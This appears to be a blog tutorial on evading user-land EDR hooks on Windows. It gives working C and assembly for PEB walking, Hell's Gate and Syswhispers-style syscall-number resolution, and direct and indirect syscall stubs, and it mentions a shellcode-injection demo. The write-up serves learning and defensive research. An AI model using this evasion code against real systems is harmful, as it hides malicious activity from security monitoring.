Using syscalls to bypass User-land EDR hooks
My last post discussed about syscalls in Windows, and how they help form a bridge between user-mode and kernel mode. Many EDR solutions seek to monitor this bridge by hooking the user-land functions, in an attempt to control subsequent syscalls.
But what if we could bypass all of that with our own syscalls? That way, we don’t need to call any of the user-land functions, and yet achieve the same results.
This post discusses the concepts of direct and indirect syscalls, and showcases how to use this idea to bypass user-land EDR hooks.
How EDR hooks work
If you are not familiar with what WinAPI hooks are, checkout one of my previous posts — API hooking with Detours on Windows.
The idea is simple — replace the first few opcodes of a WinAPI function with a jmp XXXXXXXX
instruction that redirects execution to a hook function of our choice. EDRs may do the same, to monitor function invocations, and optionally halt and alert if anything is suspicious.
The whole idea with using syscalls to bypass these hooks, is to construct our own syscalls. With this, we would no longer need to invoke any of the hooked WinAPIs, and thus be stealthy.
If you don’t know how syscalls work and why they even exist, check out my last post — A Gentle Introduction to Syscalls in Windows.
All that remains is to find out SSNs of the necessary syscalls, then perform these syscalls ourselves.
Finding out SSNs statically
SSNs of the same syscalls may vary between different Windows versions. To statically derive these values, there are two approaches—
- Parse the target DLL from disk, seek to the target exported function, then read off the SSN value from the opcodes. You could either do this on the target itself, or get the DLL from an installed copy of the same version of Windows and throw it under a dissassembler.
- With knowledge of the target’s Windows version, find out the SSN from some catalogue of SSNs meant for that particular version. An excellent resource for this is — https://github.com/j00ru/windows-syscalls.
The first approach is similar to the below mentioned “Hell’s Gate” approach, so it will be explained there.
Finding out SSNs at runtime
From the last section, it’s obvious that there’s a caveat to finding SSNs statically — if there’s a new version of Windows you’re to target, you might not find its SSN yet in repositories.
Since you can’t rely on hardcoded SSNs, you will need to find out the SSNs at runtime.
Prerequisite — getting a handle to target DLLs in memory
Both the approaches to be discussed rely on getting a handle to the target DLL first, and then getting the pointer to the target function.
You can’t use the trivial GetModuleHandle
and the GetProcAddress
approach, because remember, you’re trying to use only syscalls for all executions.
For the GetModuleHandle
part, you can write your own custom function that does the same. A module handle is simply the memory location where it’s loaded. As it happens, a process’s PEB contains a linked list of loaded DLLs (in Ldr
field, according to MSDN). Each item on that list is a LDR_DATA_TABLE_ENTRY
object (https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm). Each such object is meant for each loaded DLL. And yes, it contains a pointer to the loaded DLL’s base address, which is the handle we want.
As for the GetProcAddress
part, once you have the base of the target DLL, treat that as pointer to a PE object, parse the appropriate headers to get pointers to the export directory, which in turn would point you towards the exported functions.
Now all this is theoretical. Here’s a snippet of my code for custom implementation of GetModuleHandle
and GetProcAddress
.
void RtlZeroMemoryCustom(IN PBYTE pBuf, IN DWORD bufSize) {
for (int i = 0; i < bufSize; i++) {
pBuf[i] = 0;
}
}
void WideStringToLower(IN PWCHAR strIn, IN OUT PWCHAR strOut) {
int stringLenBytes = lstrlenW(strIn) * sizeof(WCHAR);
for (int i = 0; i < stringLenBytes; i++) {
strOut[i] = towlower(strIn[i]);
}
}
void AsciiToWideString(IN PCHAR strIn, OUT PWCHAR strOut) {
mbstate_t state;
SIZE_T strInLen = strlen(strIn);
SIZE_T retVal = 0;
memset(&state, 0, sizeof(state));
mbsrtowcs_s(&retVal, strOut, 1 + (strInLen * sizeof(WCHAR)), &strIn, strInLen, &state);
}
HMODULE GetModuleHandleCustom(PCHAR moduleName) {
// Get PEB from GS register (for x64) or FS register (for x86)
#ifdef _WIN64
PPEB pPeb = (PVOID)(__readgsqword(12 * sizeof(PVOID)));
#elif _WIN32
PPEB pPeb = (PVOID)(__readfsdword(12 * sizeof(PVOID)));
#endif
// Convert module name from ASCII to Unicode lower
WCHAR moduleNameW[MAX_PATH * sizeof(WCHAR)];
WCHAR moduleNameWLower[MAX_PATH];
AsciiToWideString(moduleName, moduleNameW);
RtlZeroMemoryCustom(moduleNameWLower, MAX_PATH);
WideStringToLower(moduleNameW, moduleNameWLower);
// Cycle through modules and select the necessary one
WCHAR dllNameCurrLower[MAX_PATH];
LIST_ENTRY listEntry = pPeb->Ldr->InMemoryOrderModuleList;
PLDR_DATA_TABLE_ENTRY pDataTableEntry = listEntry.Flink;
PLDR_DATA_TABLE_ENTRY pDataTableEntryFirst = listEntry.Flink;
while (TRUE) {
// If current module's name matches, return address to it
RtlZeroMemoryCustom(dllNameCurrLower, MAX_PATH);
WideStringToLower(pDataTableEntry->FullDllName.Buffer, dllNameCurrLower);
if (lstrcmpW(dllNameCurrLower, moduleNameWLower) == 0) {
return (HMODULE)pDataTableEntry->Reserved2[0];
}
// Move to next entry
pDataTableEntry = pDataTableEntry->Reserved1[0];
// Break if we reach first element of the circular linked list
if (pDataTableEntry == pDataTableEntryFirst) {
break;
}
}
// If execution comes here, it means module was not found
return NULL;
}
PVOID GetProcAddressCustom(HMODULE hModule, PCHAR procName) {
// Get export data directory
PBYTE pModuleBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(pModuleBase + pDosHeader->e_lfanew);
PIMAGE_EXPORT_DIRECTORY pDirectoryExport = (PIMAGE_EXPORT_DIRECTORY)(pModuleBase + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PDWORD pAddressOfNames = (pModuleBase + (pDirectoryExport->AddressOfNames));
PWORD pAddressOfOrdinals = (pModuleBase + (pDirectoryExport->AddressOfNameOrdinals));
PDWORD pAddressOfFunctions = (pModuleBase + (pDirectoryExport->AddressOfFunctions));
for (int i = 0; i < pDirectoryExport->NumberOfNames; i++) {
PCHAR procNameCurr = pModuleBase + pAddressOfNames[i];
if (strcmp(procNameCurr, procName) == 0) {
return (PVOID)(pModuleBase + pAddressOfFunctions[pAddressOfOrdinals[i]]);
}
}
return NULL;
}
Hell’s Gate approach
Whether by parsing the PE structure of the target DLL on disk, or parsing the loaded instance of the DLL in memory, it’s possible to find out the SSNs.
The mov eax, 55
instruction in the above example is the opcode that moves the SSN to eax
. Hence the SSN for nt!NtCreateFile
is 0x55
.
This is the Hell’s Gate approach — just parse the PE and read off the SSN from the opcodes.
The below code shows two approaches of doing the same.
- You can anchor on the
mov r10, rcx
instruction and search forward for themov eax, XX
instruction, then read theXX
. - Or, you can anchor on
ret
(orint 2E
) and search backwards for the samemov eax, XX
instruction.
void GetSsnFromSyscallFunctionHellsGate(IN PVOID pFunc, OUT PWORD pSsn, OUT PVOID pSyscall) {
DWORD32 searchAnchorBase = 0; // Start offset of pattern checking
/*
* APPROACH ONE
mov r10,rcx # 4C 8BD1 # <-- Search anchor
mov eax,18 # B8 18000000 # <-- Search target
test byte ptr ds:[7FFE0308],1 # F60425 0803FE7F 01
jne ntdll.7FFDA6150435 # 75 03
syscall # 0F05
ret # C3
int 2E # CD 2E
ret # C3
*/
while (1) {
// Perform pattern matching
if (
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0x4C && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x8B && GetByteAtAddress(pFunc, searchAnchorBase + 2) == 0xD1) && // mov r10,rcx # 4C 8BD1
(GetByteAtAddress(pFunc, searchAnchorBase + 3) == 0xB8) && // mov eax,18 # B8 XXXXXXXX
(GetByteAtAddress(pFunc, searchAnchorBase + 18) == 0x0F && GetByteAtAddress(pFunc, searchAnchorBase + 19) == 0x05) && // syscall # 0F05
(GetByteAtAddress(pFunc, searchAnchorBase + 20) == 0xC3) // ret # C3
) {
*pSsn = GetWordAtAddress(pFunc, searchAnchorBase + 4);
#ifdef _M_X64
* (DWORD64*)pSyscall = GetAddressAfterOffset(pFunc, searchAnchorBase + 18);
#else
* (DWORD32*)pSyscall = GetAddressAfterOffset(pFunc, searchAnchorBase + 18);
#endif
return;
}
// Break if return is reached
if (GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xC3) {
break;
}
// Proceed to search from next byte
searchAnchorBase += 1;
}
#ifdef _M_X64
if (*(DWORD64*)pSyscall != NULL) return; // If Approach 1 worked, return
#else
if (*(DWORD32*)pSyscall != NULL) return; // If Approach 1 worked, return
#endif
/*
* APPROACH TWO
mov r10,rcx # 4C 8BD1
mov eax,18 # B8 18000000 # <-- Search target
test byte ptr ds:[7FFE0308],1 # F60425 0803FE7F 01
jne ntdll.7FFDA6150435 # 75 03
syscall # 0F05 # <-- Search anchor
ret # C3
int 2E # CD 2E # <-- Search anchor
ret # C3
*/
searchAnchorBase = 0;
while (1) {
// First anchor on syscall or int
if (
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0x0F && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x05) || // syscall # 0F05
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xCD && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x2E) // int 2E # CD 2E
) {
// Then traverse backwards till ret of previous function while trying to find "mov eax"
DWORD32 searchAnchorBase2 = searchAnchorBase - 1;
while (1) {
if (GetByteAtAddress(pFunc, searchAnchorBase2 + 0) == 0xB8) { // mov eax,18 # B8 18000000
*pSsn = GetWordAtAddress(pFunc, searchAnchorBase2 + 1);
#ifdef _M_X64
* (DWORD64*)pSyscall = (PVOID)((DWORD64)pFunc + searchAnchorBase + 0);
#else
* (DWORD32*)pSyscall = (PVOID)((DWORD32)pFunc + searchAnchorBase + 0);
#endif
return;
}
// Break if beginning of the function is reached
if (searchAnchorBase2 == 0) {
break;
}
// Proceed to search from previous byte
searchAnchorBase2 -= 1;
}
}
// Break if return is reached
if (GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xC3) {
break;
}
// Proceed to search from next byte
searchAnchorBase += 1;
}
}
Hell’s Gate is not just about parsing the correct SSN. The second half is about executing a syscall with the found SSN, which will be shown in Executing syscalls ourselves section below.
Syswhispers approach
Here’s the caveat with the previous approach — you won’t find the SSN in the opcode there if the opcode itself does not exist. How? Remember EDR hooks? EDRs may just move the mov eax, XX
instruction to the hook function, thus maintaining complete functionality while deterring attempts to parse the mov
opcode. Or it may just leave it there, but since the first few opcodes are replaced with a hook jump, your pattern-matching attempts may fail.
One of the Syswhispers approach takes a different route. Thing is, if you extracted all the syscall function addresses (for example, functions that start with Nt
in ntdll.dll
), sorted them, and placed them in an array, the array indices would correspond to the SSNs. As an example, if the function address for NtCreateFile
is on index 0x55
, its SSN would also be 0x55
.
It’s possible to use the running process’s PEB to get a list of loaded DLLs, and then using that list to get a list of the function addresses and names. We could then filter for the function names, select only the ones starting with Nt
(or Zw
), then sort them ourselves, and then locate the target function’s address in the sorted array. The located index would be the SSN.
The below code shows this approach.
void GetSsnFromSyscallFunctionSyswhispersSortedFunctions(HMODULE IN hModule, IN PVOID pFunc, OUT PWORD pSsn, OUT PVOID pSyscall) {
// Get function addresses of module that contains target function
PBYTE pModuleBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(pModuleBase + pDosHeader->e_lfanew);
PIMAGE_EXPORT_DIRECTORY pDirectoryExport = (PIMAGE_EXPORT_DIRECTORY)(pModuleBase + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Filter above functions for names starting with "Zw"
PDWORD pAddressOfFunctions = (pModuleBase + (pDirectoryExport->AddressOfFunctions));
PDWORD pAddressOfNames = (pModuleBase + (pDirectoryExport->AddressOfNames));
PWORD pAddressOfOrdinals = (pModuleBase + (pDirectoryExport->AddressOfNameOrdinals));
PVOID pAddressOfFunctionsFiltered = malloc(sizeof(PVOID) * pDirectoryExport->NumberOfNames);
if (pAddressOfFunctionsFiltered == NULL) return;
DWORD numberOfFunctionsZw = 0;
for (DWORD i = 0; i < pDirectoryExport->NumberOfNames; i++) {
PCHAR procNameCurr = pModuleBase + pAddressOfNames[i];
if (procNameCurr[0] == 'Z' && procNameCurr[1] == 'w') {
#ifdef _M_X64
((DWORD64*)pAddressOfFunctionsFiltered)[numberOfFunctionsZw++] = (PVOID)(pModuleBase + pAddressOfFunctions[pAddressOfOrdinals[i]]);
#else
((DWORD32*)pAddressOfFunctionsFiltered)[numberOfFunctionsZw++] = (PVOID)(pModuleBase + pAddressOfFunctions[pAddressOfOrdinals[i]]);
#endif
}
}
// Sort above filtered function addresses
PVOID pAddressOfFunctionsFilteredSorted = malloc(sizeof(PVOID)* numberOfFunctionsZw);
if (pAddressOfFunctionsFilteredSorted == NULL) return;
SortIntegersArrayDWORD64(pAddressOfFunctionsFiltered, pAddressOfFunctionsFilteredSorted, numberOfFunctionsZw);
// Search for target function; the index found is the required target SSN
DWORD funcIndex = -1;
for (DWORD i = 0; i < numberOfFunctionsZw; i++) {
#ifdef _M_X64
if (((DWORD64*)pAddressOfFunctionsFilteredSorted)[i] == pFunc) {
#else
if (((DWORD32*)pAddressOfFunctionsFilteredSorted)[i] == pFunc) {
#endif
funcIndex = i;
break;
}
}
if (funcIndex == -1) return;
*pSsn = funcIndex;
// Get the Syscall address too
GetSyscallAddress(pFunc, pSyscall);
// Cleanup
free(pAddressOfFunctionsFiltered);
free(pAddressOfFunctionsFilteredSorted);
}
Executing syscalls ourselves
Direct syscalls
Now that we have a SSN, the next step is to execute a syscall. This would require some low-level assembly.
In the opcodes prior to the actual syscall
, there were some register transfers observed. Notably, rcx
was moved to r10
. According to x64 and fastcall calling conventions, rcx
holds the first parameter of a function call. We could write a function that executes a syscall
, and provide the SSN as an argument. But that would mess up the syscall
which expects the first parameter be the actual parameter meant for the syscall
itself. We could place the SSN as the last argument instead. But this will require individual syscall custom functions for each syscall attempt, since syscall functions all have different number and types of arguments.
This is where the second half of the Hell’s Gate technique comes in. Instead of doing the syscall directly in one function, we split it in two. The first function stages the input parameter SSN by storing it in a local variable. The second function is actually the responsible for the syscall, and reads the SSN from the previously mentioned variable instead of relying on it being given in the function call parameter. This way, we can make a custom generic syscall wrapper for any arbitrary syscall function.
Here’s what I mean, in code:
.data
ssn DWORD 000h
.code
StageSyscall PROC
mov ssn, ecx
ret
StageSyscall ENDP
PerformSyscall PROC
mov r10, rcx
mov eax, ssn
syscall
ret
PerformSyscall ENDP
End
StageSyscall
saves the input parameter from ecx
in the global variable ssn
. And then PerformSyscall
does the actual syscall by replicating the syscall functions we dissassembled before.
Here’s how a nt!NtWaitForSingleObject
syscall can be executed with the above two functions:
// Wait for thread to finish
/*
NTSTATUS NtWaitForSingleObject(
[in] HANDLE Handle,
[in] BOOLEAN Alertable,
[in] PLARGE_INTEGER Timeout
);
*/
StageDirectSyscall(ssnNtWaitForSingleObject);
status = PerformSyscall(
hThread,
FALSE,
NULL
);
Indirect syscalls
There’s one caveat with the previous approach. The syscall
is done straight from your code. That doesn’t happen normally. EDR products monitor callstacks. When they would see that the syscall
did not come from, say ntdll
but rather from main
, they would raise alerts.
This approach can be defeated by not calling syscall
ourselves, but instead jumping to a memory location which contains the syscall
opcode. And which are such memory locations? Every single syscall functions like ntdll!NtCreateFile
.
Indirect syscall is exactly this. Instead of calling syscall
ourselves, we simply jump to an address which has the syscall
opcode. Given the target function’s address, we can parse it to extract out the syscall
address.
void GetSyscallAddress(IN PVOID pFunc, OUT PVOID pSyscall) {
DWORD32 searchAnchorBase = 0; // Start offset of pattern checking
/*
syscall # 0F05 # <-- Search target
ret # C3
*/
while (1) {
// Perform pattern matching
if (
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0x0F && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x05) // syscall # 0F05
) {
#ifdef _M_X64
* (DWORD64*)pSyscall = (PVOID)((DWORD64)pFunc + searchAnchorBase + 0);
#else
* (DWORD32*)pSyscall = (PVOID)((DWORD32)pFunc + searchAnchorBase + 0);
#endif
return;
}
// Break if return is reached
if (GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xC3) {
break;
}
// Proceed to search from next byte
searchAnchorBase += 1;
}
}
As an example, using the above function on 0x7FF8A8DB0BC0
here (beginning of NtCreateFile
) would yield 0x7FF8A8DB0BD2
(the address containing the syscall
opcode).
Now all that we have to do is to modify the previous “Direct Syscall”’s assembly and replace the syscall
instruction with a jmp XXXXXXXX
instruction. The syscall
address can be staged in the StageIndirectSyscall
itself along with the ssn
.
.data
ssn DWORD 000h
syscallAddr QWORD 000h
.code
StageIndirectSyscall PROC
mov ssn, ecx
mov syscallAddr, rdx
ret
StageIndirectSyscall ENDP
PerformIndirectSyscall PROC
mov r10, rcx
mov eax, ssn
jmp syscallAddr
ret
PerformIndirectSyscall ENDP
End
Based on this, this is how you would invoke nt!NtWaitForSingleObject
.
// Wait for thread to finish
/*
NTSTATUS NtWaitForSingleObject(
[in] HANDLE Handle,
[in] BOOLEAN Alertable,
[in] PLARGE_INTEGER Timeout
);
*/
StageIndirectSyscall(ssnNtWaitForSingleObject, pSyscall);
status = PerformIndirectSyscall(
hThread,
FALSE,
NULL
);
This time, the callstack will show that the syscall
came from ntdll
instead of main
, because it did.
A demo — shellcode injection via new thread
Putting all the above concepts and code together, we can come up with a simple POC that executes a shellcode with syscalls. Here’s my attempt.
The shellcode I used just pops up the calculator.
Conclusion
WinAPIs abstract away all syscalls from you, so there’s no legitimate use of custom syscalls other than scenarios where you cannot rely on these WinAPIs — whether that be developing defensive or offensive toolings to validate the security stature of a system.
Earlier, security vendors used to hook kernel-mode routines themselves. However Microsoft pushed them out with PatchGuard. And with the recent incident with Crowdstrike, Microsoft plans to push out security vendors even further away from the kernel.
References
- https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/glimpse-into-ssdt-in-windows-x64-kernel
- https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
- https://github.com/j00ru/windows-syscalls
- https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
- https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm